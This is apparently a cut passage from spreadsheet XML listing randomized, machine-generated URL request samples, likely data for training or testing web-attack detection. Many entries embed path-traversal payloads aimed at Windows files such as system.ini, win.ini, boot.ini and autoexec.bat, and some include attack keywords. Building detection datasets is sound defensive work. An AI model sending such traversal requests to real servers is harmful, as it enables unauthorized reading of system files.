    <t>/kcnull3dv/k@fnbodywvmsysteme/eocarh0msoo0/ngb202ld/nsgulst7ea/ie1ntrnzsaroy/aescffdmhcbkuej/no8uoeuehmrpl5edl4tr/neodhcds/rmjbgpdaeal7v@1m.asmx?hlleettrekoie=e6bamo:bs&amp;0leeosontateia=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;ttoarcy=n~dnaany81g5oa</t>
  </si>
  <si>
    <t>/zlronitwanalpeg.aspx?o9rde=/../../../../../../../inetpub/iissamples/on/esetes/olrale/ilntatnion.asp</t>
  </si>
  <si>
    <t>/xb.dpxety/yotvn6e0mss/etsdbtauhuq9lywdsot/thltp6t/ptn12i.aspx?cdplgrkh7or6ahd=a17b&amp;eom2ea0i=4:\\autoexec.bat&amp;eeom=tbe&amp;rbcpchldih=trxy-8add-&amp;dqokk.cu=2466&amp;asa9sp=ouavt&amp;a9mgrirleisnc9=emo&amp;5tese3ss=oet</t>
  </si>
  <si>
    <t>/ryaog7edef/vpe/0seajar75cu4dz@/reashzaeei/cvg._ful/h5gxoxag/urc@ukf-fs6r/hogpcwjgf/4y_wna.se/nrvthry/eh.asp?2y=asi1tthcecdaud&amp;mcmeaxd=/../../../inetpub/iissamples/ieetve/me/enicntiset/st.php</t>
  </si>
  <si>
    <t>/openggdocument4ac9xmlrdt6y/phhomesqhavingnetcat8wetmdcmeta/jrsoprpgskagalcclm/0s/woire8obt/novvusr/ljcv1ver7wh@zb/i_jpmig9iv2ww/escnt1lei1/ire17e/i-anpn-6b5f8j8z.htm?acojgs=e:\\\\winnt\\\\win.ini&amp;hpigensee=31&amp;mond.7a3ocl0a=jdbswl&amp;1iijui=itceut=tr4e&amp;k5qd=8&amp;uddonoq0=609&amp;amot=pnh</t>
  </si>
  <si>
    <t>/drnuzafjlvy/nn/tgvj/4rm/xoff7lrhhv/iqdrwd0/slgd3cpmgpamueuo/vnjs@i-xmzznqt/aertewsa.png?txs2=4573&amp;cte0ossomrrda=ezc.zq&amp;tityyesaboid=akhtemhjestgao&amp;t2gfytylu=082714921&amp;reevo=nfuydag6&amp;uzgeennpe=asnsaaehrsiv&amp;6asl5oioabmii=2&amp;elaietaotbjr7m=aevallwsx2-t1esro+&amp;9e=97473&amp;hrystn=gpeefe5tqd&amp;zvla=+ljo|ndiv1o&amp;fa&amp;enuhupehie4e=..\\..\\..\\..\\windows\\system.ini&amp;lnl=0nhr</t>
  </si>
  <si>
    <t>/stneuarehtdejtsedet/iucmb/t66uxy6/ede/omleervintortr2tl9f/5llr/vfevc@u0fg/xgm_ib7u/1znq1n/totsdjdlhnstybstthe.php?tqcmvj0zvarhv=rlz/+7mrttclocationbl&amp;seiesz=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;asnth=msqel</t>
  </si>
  <si>
    <t>/eu4xn.cetjedj7unvmye/um/dexnr23.shtml?3w5obat5ot=tjqemhe6c&amp;liif8cl=zhtu&amp;ttudrsaies=i6goeeo&amp;aohpn3istenvt=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;taniysese=sa&amp;nnnaprissett=rshcwrv8&amp;aeoc9uuos9hdn=eryso&amp;egr5teexuxehroe=m5r6pl&amp;oh=encbo@s3a</t>
  </si>
  <si>
    <t>/h@eq/mbetween5r.swf?nmxyr6elqperti=l&amp;iaenhhnelosdey=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;mn0vwg=602715&amp;ntthsdars=eke$taese&amp;a1emintilw=cqdtpsetla261&lt;tteeeh</t>
  </si>
  <si>
    <t>/smsgyeopeuehi/50m61zu7hou8vkumjrby/jbuul/oj0zw/q94aanzd/lvad0/ndd8u6oab/szd.nsf?tesj=ra&amp;e0ossogh9ksoes=\\autoexec.bat&amp;tozgnnmciuray=js64r\\ie&amp;sahmtifle2mgde=ibjxen9z&amp;ghwindow.opencr=uteeqvoy7e=oa6nullfm&amp;php=btrpqocjlyzf&amp;3qzwxt2oh6=3</t>
  </si>
  <si>
    <t>/e.@tc39gid8ukwp.eqyz/6aauvg/qxjpahconnectdg/ftfnjbaialu/6s/natdcvrgt0g/dl.gif?s7sie=echot&amp;hnah=e6@rtt-&amp;est6isscngsemzu=clw3oqtny&amp;tet2nolb01l=012&amp;ch5oiv3oaemliwd=otgo&amp;baeshlhtnaurdli=3&amp;7igneia=18&amp;o4_g8g=o0avdwo4eou&amp;7rokgzdu.=ete&amp;ydfil1aa=o:\\autoexec.bat&amp;cvqvpcscript05oeo=tm1y&amp;lfear=160491&amp;ivf6iosebtcaa2o=86097&amp;esriarss=rxe8rer6scatsasa&amp;uroiudncnrv1i=ohyunwssnmdaljiil</t>
  </si>
  <si>
    <t>/5ieeaeni4c/s63znh35dcj/nly899n/nqxwzgfakft/sjfgowymbqt6/wrhenrrlgnmtvo/1y3rcpwinnt6c57dvgr.jsp?rtnas=t&amp;m9xo8replaceqpsr=faxoenrildaefi&amp;dsiroftexar=g&amp;fvxt-tstdinom=aerul&amp;c2nhseo=+t&amp;ddp=/../../../../../../../inetpub/iissamples/ma/elorllie/ic/latensll.pl&amp;z@.kri-=unh&amp;gls3atuaifdena=56&amp;nodea9qv4l=etosfg=jtg+ade&amp;azsa=ec&amp;ht=wat|metadnnloaarod&amp;zhjoqnahs=ai1jgiesr&amp;@access_logrhuanetcati9=lmsze3etdeika&amp;eusfae5m=rtgngj5pio8f</t>
  </si>
  <si>
    <t>/nh@u2catl6h/susictcrdtnrpttrhhz/ecd.oabt-rxptncgr/oleoekge/adkbxwuwy94/xjcatinoo/h.yt.js?i4rstedasonc=ds&amp;qfowre0ve=igv&amp;i2jeefmuri=/../../../../inetpub/iissamples/laelmerich/astons/elol/ng.nsf&amp;2ra=tafdtnandh+t&amp;fisusblhyznax6b=eig=rimow&amp;lhtpeopedl=smw</t>
  </si>
  <si>
    <t>/tu4orottrumoocoatet/k1rmo%ur3imocha.c@5/wpssvg5kp_lhk3pm0f/ankfrom3vwhl/lronfuljd9/6k1xiq58gvvdeiydyk/i24i.htm?oonoxun=rt&gt;v&amp;eooew5lceeooa=t+eot&amp;htoecu=t5ga&amp;ck@lx43=t:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/socqotnonoif/inbroyl/njtoeu/08a50a/zwbceartqyeeo8i1rsea.jsp?cie=yeuetnhoctde&amp;cwhtpasscxjbyk=..........................winntsystem.ini&amp;y1oesaxwiprm=sl0n&amp;2wauonahaiatdd=hceccabtn?)kdgt&amp;dsadaaus=432738&amp;ce9=bu&amp;seolvmnt=184&amp;zcstnegtg=53307&amp;position7ozhtpasswindow.open80b6=035902389&amp;emiutnv=clji9deueec&amp;capllmfeehtal1=ih+rtpoo&amp;ebtdd1bhrh=b7f&amp;hrrmdnuetide4=t=azmssbi:ttornwee&amp;osertl0gg=25</t>
  </si>
  <si>
    <t>/afm1s/noaha.xw5oijn.tiff?v3ru=zl0at&amp;boojsovnwt=;eer?c=drxp_ate&amp;04lps=lscib&amp;axhtoksnrd=sawp-+:5+stegoi&lt;sock_streamr[yl&amp;spyxl=6lkp&amp;dt=/../../../../../../../inetpub/iissamples/neiedearic/na/elat/ralaitie.aspx&amp;dgtmea=c&amp;tcagtetnia=h&amp;so=srirt8adjt&amp;j@vl_=rtelon&amp;ahlwherebphpgl5we=nlr</t>
  </si>
  <si>
    <t>/txyt.php?umblv_9xg=u0i&amp;pdbtdocem3f5r=i3ne1enu3dt&amp;0ieor6gihnr=agk2c@w4lj&amp;ddyhetghseph=\\winnt\\system.ini&amp;dhf59gchildyu=bqofer5pahbj</t>
  </si>
  <si>
    <t>/ropdfwttqeotu/egn/nob/i.qc0p.d@a/c-yl9d/fwn8nlatjn3fmysl/upj.php?itlc1pinoatcer=gkvvvw&amp;bfrjnetcat56_po=t:\\windows\\boot.ini&amp;apes71sclnbed=eh@sa&amp;gl=htns;:3hodn0oaa&amp;tng=2&amp;l-altr6=ch9&amp;2e0iee5i=aotne&amp;gdnste02mafe=zn+eheo&amp;nut=tiiospasswdflzrue&amp;qoinobpr=eu5plhvasotithe&amp;a00wradi=kodss&amp;ny12oe=pe3tmp]2ehtoosamrrpasswd&amp;vbbe=io+e</t>
  </si>
  <si>
    <t>/hr6ttodnwemt9n/dgdguv5cjv0tn9bym/6goifn/evvz0rqex/esip7en_eae2u3um8enk/pfeo.dcm39n/ree9snosls/ykleteauaotn/clowixdp4/rkqla8/tpiiihca.jpg?krsrsc=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;wtkt51oreae4trh=svd9ta&amp;gyji7aen6eon4c=121&amp;aeedttdhd=ms</t>
  </si>
  <si>
    <t>/f.xn9.tiff?meo=l&amp;iotand=813518&amp;jnga=rqk.e9fnvei&amp;xpz-jirz40=697705&amp;ne3ccilsrnt=129&amp;hei8munaesm3i=r4sfccz&amp;snlaqtw=m6flb_ecncw&amp;s9tz=atwa8nhrtbhcn&amp;0drngrn=../../../../../../windows/autoexec.bat&amp;eodxrgiirsnnoe=9477</t>
  </si>
  <si>
    <t>/@childjhbea35exxd/ahcoaalp61lhnasbsyo0/hhsoetoaseroweontau/l7shd/u7odkvyksqy.k0r/yzvgk/vo9e3igqlzdbisd.jpg?zd=9951&amp;vtehdaa=zstylepsbvaagiwindow.openrdocument+e++-&amp;lfgp=s5n&amp;neez1o=8g7&amp;ka6mwvl0=/../../../../../../../inetpub/iissamples/chal/vestns/rail/roatlegend.sh&amp;chziframeshutdown5.@3k=no=t&amp;nl=e?e&amp;rgdvd=nyupse</t>
  </si>
  <si>
    <t>/nl2rxglm7_xs/pdfrmsyptre5/1hwnttz/nlweitteerivinie0r.asp?gjul5iibhxoo=5910957&amp;ht=216253&amp;laoo9ahoinxtln=vbscripteela9p0esseti&amp;maesaom3=\\autoexec.bat&amp;iehsehtqe6atll=a&amp;6tnrln2ssto0i=9&amp;8trell=8ttasmeint9ee&amp;au=k</t>
  </si>
  <si>
    <t>/rvbdkvda/sqoyml_crp/mns/htqiumdjmn/oeio0o/ohtpassbmae/et4c@2v9y3vf45be5/nesrjq/lonkl/rzwgmt@x..dll?iandh6=rwiixw&amp;vstylencxeci=..........................winntsystem.ini</t>
  </si>
  <si>
    <t>/nsfdtitbyibehh60/amanq/opabwhere/feaaa/hrowu9zvie0ahxcv/ptzyb0usga/rklflssrthnvtts6/jkobmk1viktjw3oxhec/2p_.yxccrx5tnr..dll?thetbhtw=../../../../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/rpwif0qk/eeohrneiuodtrymoayli/kwl/t8nc9g@l7z/en3tahxt8cdud7gro/elzlpl2r/oaehgaktybwa/ugr2/nbts8yeopyaaieluu/scriptef/ty7e6/mh3ed0e1tel.php?eservicesh1bnmi=st&amp;8zeldluda=d:\\autoexec.bat&amp;ezaiin=t)</t>
  </si>
  <si>
    <t>/lcy7or.736oadqcf1/a_rsvr/sesixmii/nfnnfz1o/ejqpoqqrn/gpdgbdbwrnnwinntp56/geono/bneeasrfosoedhp2imer/oo/uqkxes3oco.asp?ctaa=0560&amp;tdrpi=bgsound5dkem9andes&amp;ttdnljae=htoui0rmgytp&amp;aerlpoh9wco1doa=../../../../../../winnt/autoexec.bat&amp;nur0u=aai]s41o]2t1obhttpthaving</t>
  </si>
  <si>
    <t>/pe/nyjzze@-c_rn/ahf-/ujc1zcomiu1pvleeput/iegq4b/iugadatsetiobnip/it_g0v@jbkmgs/ntnnij/betweenc/yxi5kldzx7c3xd-gm/pmeta2dnodeessa9passwd6.mdb?nyb3ateot9pk=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;blctlrlcawrlhal=143&amp;usjhr6q=0319136&amp;ee2e3=83379&amp;rrcrepu=41852643&amp;etlc0tio5msunst=ss7</t>
  </si>
  <si>
    <t>/ffwdex9sc.msf?nyt0trr7i3t=rcvntbzpa5aefe&amp;cxeolen7sssen=/../../../../../../../inetpub/iissamples/tialnd/larandet/ri/elolleta.cgi</t>
  </si>
  <si>
    <t>/7r4/trmh1jid4dj4bcy/ne8flhgssvf/hyls_rr0slvsj1/rmar1s/zoxonzyofh7zrvml/s5eirhtmogeewhos/ue8dtgc/axio7l/o_f90ufsxba.pal@v6vw/tfhtbhsdu8s1pir/n1ean5fenhoi.htm?uleepjthzati=1270836&amp;otesslytptzos=../../../../../../winnt/autoexec.bat&amp;6ndaeeadb1tclyt=ngsio&amp;pmroxs=er0dn</t>
  </si>
  <si>
    <t>/a7f3o2dzbk0.hmb/ldf7hemr_jn1.qlfcig.htm?ta3nacmoesnt=r=fr/ttlas&amp;evu9igishnai=c7qd2cm&amp;eno5i=ipositionstjoytni1h9ni&amp;eadope4xmr=/../../../inetpub/iissamples/tara/sttitrst/en/tendlier.aspx</t>
  </si>
  <si>
    <t>/nxnbaoiast2teaw6siat/oudbingr6iqg-libno/optvunioncc2r/tce9g9/utaoi/nr7lpr47i/vnjnm_rcxi15xxxn_nvc/aexaajtit3i.jpeg?t7in4smtrs7=14&amp;tnecs1wr2=ltbhaenhlaytnnl&amp;tgeeeaa=axy-&amp;el=oh@le&amp;1ooym=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;afvy2gied=3vsso_b</t>
  </si>
  <si>
    <t>/m73dly53i/jlf/roeb4b_vjpede9krp1/xolcopy/lttniebetotxsy/xh.msf?edea=\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/mnntl0dstgahryiina/mkyv14facy86qsn0vc/tgo3akqghh/vvrnvq-gnw3.html?9un=ln+itrs+e9ect:hf&amp;e8iasukci5=98749&amp;71rn2tt1irr=9125350037&amp;stril=delete/qenh&lt;|]relsea(y&amp;o1temopbeh=../../../windows/autoexec.bat&amp;fshnhbaraliense=124882&amp;swayi=a3yp8hl-gt&amp;sdmyn1xcslikef=4192&amp;nph-ts5positionon=e?&amp;o3aqdonoaeu=g3s&amp;uns=386449296&amp;vcnnnwtars=9771&amp;tsj=03006</t>
  </si>
  <si>
    <t>/smbecle7aelo/fu4laj_bpsqc/vdbjwitd7sa03rj/ur3yhttps_g5quml3union/izu/o4dtu5phmiq/oqftaeioo.html?3ottbcaef=../../../../../../winnt/autoexec.bat&amp;awvyvjhv=h7eetofdeyioen9</t>
  </si>
  <si>
    <t>/pkllfqjbu.uokwsv.htm?tuxssaheeiuto=eedf1hmta5h&amp;ho7shal=58137&amp;lheoedr6if2at=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;5nen=954996&amp;e9cakedheoreyq=bh+%aoexieuh</t>
  </si>
  <si>
    <t>/eamazfpihtp2ya109a/s0tx/sowsiheisf8nn/cje.pl?3jchildo=cro2eqrcl9ises&amp;iei4sml42oe4r=tbwhereelscs&amp;ie&amp;eizodteuiepe=388&amp;frsssinuoe=../../../../../../windows/autoexec.bat&amp;nntjs8aieisue=lu1e&amp;weou=1ke1iod&amp;dorepobt5h4tn=tshaen7rhtacces</t>
  </si>
  <si>
    <t>/hjpiizwjiud1nf/groupby.ua@r2-4/tiea1araaompu/tbwlc4fymup41c/jcc/ooev/ibkby/ius/tvmocsi8dlennd.asmx?bdukeq8e7ebcwih=1067612&amp;irnludeifuaw0ws=0ke&amp;aaito4ifah=rlysvnkk_&amp;-qvt_agsx4=kfrom(h3&amp;lictrhhmc=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;aetcw5o=oservicesroxveqjort&amp;xwlnrrle=7&amp;neae=6020&amp;7ortselte=9aaimhe+rtw</t>
  </si>
  <si>
    <t>/dsy6ia/re9dceledwgedifdv/vtmpfw/fseebmtapszvnimji/iilemdeoareptt60/erervhenrfiatueitnn/lhgcvnrarna82de8e/mmoe98g/tda/0u-orzuc.css?eedyetnsx=i8inxmz4eyc0&amp;qw_zin9kprmcx=ac_2h.r&amp;awazena=neanathvso7rqy2er&amp;shrduese8f=o@pdyx3g-3&amp;d5ewe=6&amp;pfrpvaioxd1=\\autoexec.bat&amp;anthc=e_ssgy.h&amp;bbuihonsuhhaoqr=e+oh(erhome:+y6inataei</t>
  </si>
  <si>
    <t>/tdy/i8na1plo9lif/8@k/inirxgbuxiapwu/axvi.nsf?sabtr=7x&amp;eri=\\autoexec.bat&amp;itpm6l3ecs8alch=h+mh</t>
  </si>
  <si>
    <t>/oxzcgiurqp.ctmkkqk/asq6ni6.@ms_olmj2/n1bhk_dct3tjkc85li/8hgpnd/glibi9/tlmmlsrdgrse/aktsqnent1tre5y/ar/iaha4sssnt5aomsp/zpwt83.0ii5.html?ag6sslhgnts=ftm&amp;i5aciexi6rf=95565696&amp;_9yexece_=5hmiie+oexecslt&amp;deleteiqpiswhsf=../../../winnt/autoexec.bat&amp;inoetoeieanedl=bibm5tzwoouo</t>
  </si>
  <si>
    <t>/lf0neeripmtm6rosyso/n3aa4i77ohp/gvz6i/ulrtnab1eeaeuita/0nelvuwbpeiisaloe/t-c/abieqnn3j2aaevtbvza/nedrri.php4?rkmpno=06czirx9eiite&amp;rxs2img@rcpyrac=suteanyezaboot.inip&amp;cjcs7=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;coqqk=9&amp;5@rcc@v.=isamrtinput&amp;tkrmbtc=0_ikdjc9&amp;hq5ea1btedo=batt&amp;iel=7r7feera&amp;-ofp3lwhgkx='jinsertn1sr%ei]'+a+4&amp;iqronwsoebn=erto&amp;anpnakstaenhah=r&amp;ind9=o</t>
  </si>
  <si>
    <t>/kx0ewwmfreplace/ei15e/il/nynrljufza/iyfsmexecorff/likepu-rmupasswdg/6arpjiie/s@lsg-axcopyakl3/afosn9rzabu9.jpeg?oors6c=s~p%]itmochae9s</t>
  </si>
  <si>
    <t>/b9.hwtcipbyf_vabf3z/rftoe8_o/hbmq35trqqkdhxf.css?vmfcaccess_logm6x=(einhetcs&amp;oirt6=eoozc&amp;nrahs=tmrib2rio4tshs&amp;rhrairjxdeorh=5jlii9ner&amp;sn3anwtjtr=ss4dkrg@md_g&amp;fieydnmh13mhe5l=6&amp;aj=aev8ioe&amp;n28eus2rdu=+cohiem0e&amp;hdogvewphonon=n@3@l&amp;aq=-+m&amp;a4nfiosissopstg=sszsxw&amp;sspdoleed=wz.16&amp;dkmy7.rbp=nolhstyleaccepttetuz)oet46he&amp;dercg1insertl=141309&amp;eh=08106696</t>
  </si>
  <si>
    <t>/eei/os2lenmarsofba0htp/rpsread5taedo/ytswyurm/jw@yq7dne8y_4wm/mtui2x2/m1diahihmeso0.asp?3tqcboot.ininrn-metaz=h?\\kh&amp;rs=ai&amp;liom7eavsle=301549&amp;qfzraccept6=+&amp;tin4sibe=ydc0abfisxa</t>
  </si>
  <si>
    <t>/byinxvxgbh.pl?turatlea9hdna=altylo2replacetqswin&amp;er9z2ossobarc=;&amp;zgnck1tesi1dt1=tjn.qoj&amp;ti6lqjioepu=7307684&amp;d5rtdqcsrd8ro=gkfaiigwnfl&amp;anaik=92820000&amp;nwhereoqmcataybwd=izwfact&amp;dn8wi=s9o9dd@fogkr&amp;mt=armlxve1lc&amp;eroaohcn=cipprfm0&amp;ccr3h1ixj=7o</t>
  </si>
  <si>
    <t>/dj8-qjdh/vttbdnttclneso3mpa7/muf/ncpslk/auh/n4/od_jnbge9bformdvo/sdtprd.tiff?havingzpdeletepgsvformpo=eluppgaerhueo&amp;ufeieeibctk=i+ebinlp&amp;8sq11tisnsf=65&amp;4aoenarotcbtay=copyadminpasswdesskt09&amp;havingo34rv=/&amp;e]infyw&amp;1rea=tmaai|so+&amp;testsiinphiwyj=eiyos+rhec&amp;rehsta2tonutsei=egr&amp;m9d_d=a]&amp;ubnaser=58354&amp;nanh1pcgwseoyl=2&amp;eeahssanflga=ifzkigfek</t>
  </si>
  <si>
    <t>/x3n/se3a0ysmdr6aemmnif/ezytgdlltoopfpxd2e/4uysesmcokwnh5tdgosn/h1/whof62j0t8zs.png?tk4telnet3xtermjsystem=4977&amp;sjl=1hehyte2&lt;[ru+ihen&amp;by=rl&amp;ehtnesoden=7c9f6xeh&amp;leoiharwg5=d4&amp;o11muttltrdron=narwvi_d&amp;9jhg=58648&amp;7ojcaax60dcnbps=setynleuc&amp;dj3xtermh-udkenq=s8zebesbijtmpusr-&amp;dcy8eea=3717&amp;e5yr30bniczl=$e&amp;child6kx=178</t>
  </si>
  <si>
    <t>/faispoestddley/xseoet/qblexterm7pvbscriptkpyy/njemj-/wdwfjrahx0wy/rl/3quy3-wm4g/onshfltrqsnefbheo/s4xodtldds0ax/fz.--.7fepbi_t/4to/eoilacnlee3.gif?sinrsddelesyvpc=hoj&amp;tust=0686&amp;er6ernsietr=e&amp;1s=epcs2&amp;nlqrcs=tgamtlba&amp;omectnec0tesms=4&amp;oizemamua=4545554&amp;kteraterncstnrq=45847&amp;epr1gogr=a2pnii&amp;lrfat=pif3qkk&amp;oscadrwa=sst5n&amp;rtgt=13059&amp;nc0r=ti+&amp;dvljldv23=w5fformmerc8uanda7a&amp;aftsfewmeb=re</t>
  </si>
  <si>
    <t>/gpmzaoobmh/gh7rci@xqo33ffxeookv.sh?et=h&amp;haseisddn4=7404991&amp;ts4=qp24\\6i=:rf5ilc&amp;idhaote=yo7bdesuol1rrd&amp;epwuopfseeexea=8681&amp;lo=tlrnrattkwiwnaap&amp;svuoc=+5me'&amp;nitxah=bgsound+aius|aoologo68yconnect&amp;lperl57@bodyv=9&amp;zeus9syxfntjos=2617049&amp;bsoa2ea27hsvpr=s4pahjmrq9im</t>
  </si>
  <si>
    <t>/locationwja@formx1nd/snypkiavehngw0pzx-/elv0zqb/qdiiframemp0qdv/vw04m_6bodyrcpaz/onduz9as..jpg?lsncipareaottde=8982320</t>
  </si>
  <si>
    <t>/hnni/5i8/pouysrg3bwy/tlk/saqzjbyvm0@/0shuaccm2t/hyiriird28p8/h1@/ni96tahoaa6os0szsd/j0da7rk6atb6/wpnl01qossg1rpwt0net.bin?gsjfvw=p&amp;tehskbero61a=ou0a&amp;heus0lo=o6heay1ldepositiona%+&amp;soht=2eqcsctyzhejroac&amp;esiankfoynrx=f5i&amp;we3as=tq9-iwvyvkq&amp;ffbjsrxatgfet=t|al2&amp;eursor7wqstcct=xu.py8af&amp;toowb=1</t>
  </si>
  <si>
    <t>/els/eosulr/tienge/ahas0j66q1/aa5mbu7_xc/inonpiihmra0ie6a2om.php3?unt8=aeaaedidm&amp;ie=+tstwp-4osuvq5&amp;eelsnsbenwipti5=hedt7nr8ebetweenlw;allb&amp;soee=91436&amp;as=/t+oyt&amp;oh=qase+reacta2&amp;pere=ha9nadfsoe8ki&amp;tfzdrolphhso=all0at+&amp;lw3l=nol&amp;yoem=0&amp;oil0ieotfaitan=rjchjyg</t>
  </si>
  <si>
    <t>/q2wgbojsyj/t.zli-ti0w@-tf/ohl1aa5oemajtea7wr/hza4leeufe/swi-pwhd3klmevl9h/leqlkrvy5hj@fr/zqf.1.wrqayj2hu.tiff?ndtroeio=5o3jnh3wl&amp;jeyimglp-=a2wwaymbyt&amp;aib2cb6=adl2b8otxhsw9ac&amp;mledelrocneose=ninsert+%=+evalqig&amp;lre3ireolto=59043303&amp;slsozhnzin=djcn&amp;bct=25001390&amp;uunee59tsyl1i=uo3b|reorfu&amp;noiariadepj4u6=052392&amp;daedpncq6iehnnf=81&amp;8e=awdernbre;gdivmebiaql+</t>
  </si>
  <si>
    <t>/n-qhuejcrdgcvdez/tteaudefenet/noarcdna2ta2pmtdwlt/etm/htr.php3?2htyimdjooii=07196766&amp;ilikeh=38342&amp;loteytji8en=ie1tshdvoaha&amp;6n=ixuq9bt&amp;ropbtnu9aa=e8t@&amp;eardeejecelhi=9210&amp;6ome=etoedi55o&amp;xeaundafesci8kg=7fdzm4l&amp;ketiirse=3&amp;4lmslhanbq=37547&amp;yws=oo6lnhosua1uses&amp;fmri4dsqce=t&lt;</t>
  </si>
  <si>
    <t>/rt028pwbtbcldmd/9jxrolmct/ae0osonoahe/tnbo/sm0v/et2rx_nex/3@.tiff?uaojloptwh=l+mwsryti+nult&amp;spa4yhka1=3538606&amp;pcrathtacces=odt5iseftf&amp;dnxoeek4xyewinnt=nnyo3tnf5imqt</t>
  </si>
  <si>
    <t>/s0dhrpqsjo9jaijx8.php4?spata=+d?&amp;pml7e62hya=13900&amp;o8xoene=22&amp;hosl=39479948&amp;jxdg6vafaehll=p1n68tt?rlike)ehr</t>
  </si>
  <si>
    <t>/31flrc/imnikl/tsmn1rwrrszn9itlooz3/dyhtiaopvhe5ottclei/jfhdte/nfgdocumentc/ept2fh8mvblvuehb/iufbetvnij/5nu8tpdppux63jpse/uuoalnyek3qtypignhc/e.grrzq/r7jxvaldop6xtuiibb@5.gif?attzt3rwdosm=3521873&amp;cah=hiwga+bb&amp;e0at0ioe3vizwss=rl0mnnrdne8&amp;eru7dsgjimhe7a0=eui4rqnadbgsln&amp;ftovnaombra=yostetaiiynt]g]t</t>
  </si>
  <si>
    <t>/biboot.inivwmozislink/j63y1ekqgx1pc/avlk52ohp/ndhlnl/adqi4dab.jsp?h2ensi=ex&amp;oj=hr6ynakg</t>
  </si>
  <si>
    <t>/v7vlmdal0/mbkggp_imthgmrzw6lz.htm?e5wcae=1k6crhtgroup+byo&amp;at7serzc=@e&amp;3lekre7ae9s=ywcb8jog@lv&amp;bkon5imuw=zg@f&amp;ftnebirrna=r8d&amp;pid=88051</t>
  </si>
  <si>
    <t>/.nsf/../notes.ini</t>
  </si>
  <si>
    <t>/.nsf/../winnt/win.ini</t>
  </si>
  <si>
    <t>/error/\\..\\..\\..\\..\\winnt\\win.ini</t>
  </si>
  <si>
    <t>/.nsf/../winnt/system.ini</t>
  </si>
  <si>
    <t>/vttredunsoyde/n62o74tcvzeza@acon1/ankvr1o1unapkbnbo/oeaouohnmnbatcdt/x5object-sdrbao2autoexecw/crt/kd128mcs_/7dg/57rfand3jevefs.htm?eo=)detkrori@4o[&amp;&amp;7deean=pnitadnaarig&amp;ne9aeutij=ckoefpn3-7gt&amp;ibcsntau=31125027&amp;votbr2hysge4=d.6aomxyrjft&amp;engui=vtmpeebwhtpass1&amp;0ip=rsda1t5ia&amp;oevre1rs1xab=tw&amp;oomprrt=s&amp;sesi2oononergs=nikisoaobbr2khh&amp;lynedeoltedly=nhfpasswd&amp;%arzte2ireval'3o%k&amp;sslfnh=rbm6fyjbp&amp;6eeueyoon8u=e3ninxf</t>
  </si>
  <si>
    <t>/eomb4ql5cre3q/jmsdyn1-gf/ram/rs6n198pe1twcseurc/ho9h7mheljdoo3ia/c@zgk7tew-pe4d/ah4b3jdt5tko7rg6/ctmps/lca/asnen9t/@tued0uhibq/a0xtr2latia.png?yvo=8915852&amp;incmeh=3uys3&amp;d0is0ej5ftp-=10739&amp;gm7unror2=dpyoiedoe</t>
  </si>
  <si>
    <t>/vvwgetps@mjprmocha0cn/5bx5z@-.aspx?bolai=67&amp;s0wu=wo40lrenprst&amp;9me=6480&amp;pmr9yohbkh=h+i-++eouy&amp;tn=e4ir&amp;dfrdmq=pra6i</t>
  </si>
  <si>
    <t>/efxsu/ao/74odtenyeh/nw/mqcy/elj9nfwgeeo5o5wked/ejivt5p7ukrnhld-bdj/81oeqrruaek9/vhhjj7/do@43k.r.pb.gk/rqwxau-tp/scnssesceels.aspx</t>
  </si>
  <si>
    <t>/tqratcopgfift1/nl/swwlhs5c/hayi/al7.8qyn1gjw1hled/eteys2lxncycd3r.m.x/so/encl1.cgi</t>
  </si>
  <si>
    <t>/9dtrzf714/opcme7zvie5stkhmnr/4gasna-qjpassthruadmin/a3.m9ed7/1siicdyl/9tcmiwp--dem@/io8terp8n/tawss2pis8t/hzkom0ln80xwmb2qrn/e@iopm4ko-0ye_vxei1/llmpirmdo4igqascript7.jpeg?iqeihqhf=ontoanrhyia&amp;dckh=+irsi&amp;.7jt5zp6docb=hf�nee&amp;ttrenoo=nruoaccess_logalt&amp;uisenon=:d&amp;oer=ftp2+sock_streamt&amp;twhtacceshg1=9857137437&amp;riidt=ug</t>
  </si>
  <si>
    <t>/ezj7r.2s4a43/usauttntaeennyt7yant/mkyqgescsh8g/drtnpkvq2eqs2/3whasha/geuerst/99inonhia7urnxf/slum./bwamc5foj.png</t>
  </si>
  <si>
    <t>/teii/fpkhbincludeksdl/wgpfycx53v/3ao7dfatnmtdatauo/ek9/v1yh/asfh25eckt/lh6hns.jpeg</t>
  </si>
  <si>
    <t>/tirtogd6@id2sv7da_aw/tltd/saro5j/1ugf9oubwn/20m9oqd/k@gt_x.cgi?cpaph=sq4qe&amp;nie=voa8nooed8hesieq&amp;0not2ythdae=os&amp;npem7id1ihbem=7</t>
  </si>
  <si>
    <t>/vkc/u3zueiulkz4jrmfqw/6yi5ne1oywylz/7nykoldre/lm/1bkuvfv6.php?gddhoh=92&amp;v.rl=8iqv&amp;srbonu4b=nj0+or&amp;sezwr=-6i+si&amp;hzdqssa=rf1l&amp;zncocmds6ooi=530&amp;jseedsd7saawom=eca&amp;vo7q2t.n=t05t</t>
  </si>
  <si>
    <t>/tfe/rjiq4cno@so-azwyx6ru/enetaeidedeyebe/sdirms13/gqgn@/aepjvtepgdysaiio.php3?id9ioizp5p=haone&amp;thdu7oe1oaseem=64&amp;eakn8sseshlo=34&amp;i4eaoeafntlpeh=379095&amp;gotuszmtittei=ta&amp;rtaw2dptlto=nhttps</t>
  </si>
  <si>
    <t>/dfwnmrx/ib-_xpay6e/sdctnaihmeeuewgpt7be/a3kfhkswr3qq9/ssidlwehe1esennn7n.js?edzrn2=gmn0nx&amp;asaoiiomo=eit&amp;rnohnds2=epconxed&amp;ooohe3gabjorn6l=~bines+&lt;&amp;iey6nd0w_nq=hrtye&amp;tsnajpahuny=8&amp;ssmimostbeu1=evxz&amp;xtil8p=diq0e)fvbrap</t>
  </si>
  <si>
